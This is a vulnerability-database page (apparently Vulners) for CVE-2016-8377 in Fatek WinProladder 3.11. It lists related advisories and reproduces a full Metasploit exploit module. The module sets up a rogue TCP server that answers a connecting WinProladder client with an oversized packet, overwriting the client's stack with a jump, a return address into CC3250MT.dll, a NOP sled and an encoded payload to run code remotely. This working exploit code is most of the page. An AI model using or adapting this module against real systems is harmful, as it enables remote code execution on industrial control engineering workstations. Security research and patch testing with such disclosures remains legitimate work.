Vulners
Lucene search
Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow Exploit
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | PLC WinProladder Stack Buffer Overflow Vulnerability | 19 Dec 201600:00 | – | cnvd |
 | Fatek Automation PLC WinProladder Stack Buffer Overflow (CVE-2016-8377) | 26 Feb 201700:00 | – | checkpoint_advisories |
 | CVE-2016-8377 | 13 Feb 201721:00 | – | cve |
 | CVE-2016-8377 | 13 Feb 201721:00 | – | cvelist |
 | Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit) | 13 Sep 201700:00 | – | exploitdb |
 | EUVD-2016-9225 | 7 Oct 202500:30 | – | euvd |
 | Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit) | 13 Sep 201700:00 | – | exploitpack |
 | FATEK Automation PLC WinProladder Stack-Based Buffer Overflow Vulnerability | 18 Sep 201606:00 | – | ics |
 | CVE-2016-8377 | 13 Feb 201721:59 | – | nvd |
 | Fatek Automation PLC WinProladder 3.11 Build 14701 Buffer Overflow | 14 Sep 201700:00 | – | packetstorm |
10
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Fatek Automation
PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
connects to a listening server. The client does not properly sanitize the length
of the received input prior to placing it on the stack.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '16-672' ],
[ 'CVE', '2016-8377' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# CC3250MT.dll
# pop ecx/ pop ebp/ retn
'Ret' => 0x32514d79
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2016'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "A" * 10000
pkt[1092, 4] = [0x04eb9090].pack('V') # jmp $+6
pkt[1096, 4] = [target.ret].pack('V')
pkt[1100, 50] = "\x90" * 50
pkt[1150, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end
# 0day.today [2018-03-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2017 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.08653